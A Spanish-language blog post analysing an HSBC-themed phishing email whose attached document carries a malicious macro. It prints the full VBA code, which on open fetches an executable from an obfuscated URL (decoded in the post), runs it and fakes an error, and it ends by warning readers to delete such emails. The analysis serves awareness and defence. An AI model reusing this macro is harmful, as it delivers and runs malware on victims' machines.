Phishing HSBC, troyano, documento Adjunto, macro

el

ahora toca el turno a HSBC.


Este documento es generado por el atacante, involucrando a una institución conocida, con el afán de robar datos personales.

el correo llega desde:


from [127.0.0.1] (unknown [185.56.80.158]) by mail.agpsa.cl (Postfix) with ESMTPA id E44D91E25308; Tue, 15 Jul 2014 07:05:04 -0400 (CLT)

El Documento Adjunto, es mismo esquema en en casos de Telcel y Banamex



El Macro:


Rem Attribute VBA_ModuleType=VBADocumentModule
Option VBASupport 1
Private Sub Auto_Open()
Call DownloadFile(StrReverse("exe.ss/kds/segami/moc.setneilacsaugaelihcla//:ptth"), "4b646n46.exe")
End Sub
Private Sub Workbook_Open()
Call DownloadFile(StrReverse("exe.ss/kds/segami/moc.setneilacsaugaelihcla//:ptth"), "rsd54tgs.exe")
End Sub
Private Sub AutoExec()
Call DownloadFile(StrReverse("exe.ss/kds/segami/moc.setneilacsaugaelihcla//:ptth"), "ds8fydsa89f7.exe")
End Sub
Private Sub AutoOpen()
Call DownloadFile(StrReverse("exe.ss/kds/segami/moc.setneilacsaugaelihcla//:ptth"), "fsfsfsdsd.exe")
End Sub
Private Sub Document_Open()
Call DownloadFile(StrReverse("exe.ss/kds/segami/moc.setneilacsaugaelihcla//:ptth"), "hjhhjhjhjhj.exe")
End Sub
Public Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
    On Error Resume Next
    Err.Clear

    Set XML = CreateObject("Microsoft.XMLHTTP")
    Set ADS = CreateObject("ADODB.Stream")

    XML.Open "GET", URL, False
    XML.send

    XML.getAllResponseHeaders

    FullSavePath = Environ(SavePath) & "\" & SaveName

    ADS.Open
    ADS.Type = 1
    ADS.Write XML.responseBody
    ADS.SaveToFile FullSavePath, 2

    Shell FullSavePath, vbNormalFocus
    DownloadFile = True
    MsgBox "Este documento no es compatible con este equipo." & vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Error"
    Dim z
    z = 0
    Do While 1 = 1
    If z = 2 Then
    Application.DisplayAlerts = False
    Application.Quit
    End If
    z = z + 1
    Loop
End Function


Se pusieron creativos, usaron una cadera en reversa para la url... me pregunto muchas veces ¿para que?, supongo que nadie imaginaría usar algo como python para regresar la cadera.

StrReverse("exe.ss/kds/segami/moc.setneilacsaugaelihcla//:ptth")

Python 2.7.6 (default, Nov 21 2013, 15:55:38) [GCC] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> 'exe.ss/kds/segami/moc.setneilacsaugaelihcla//:ptth'[::-1]
'http://alchileaguascalientes.com/images/sdk/ss.exe'



Este Código, solo funciona en Equipos Windows, mantengan su antivirus actualizado. eliminen el correo sin intentar abrir el documento adjunto




Comentarios

Publicar un comentario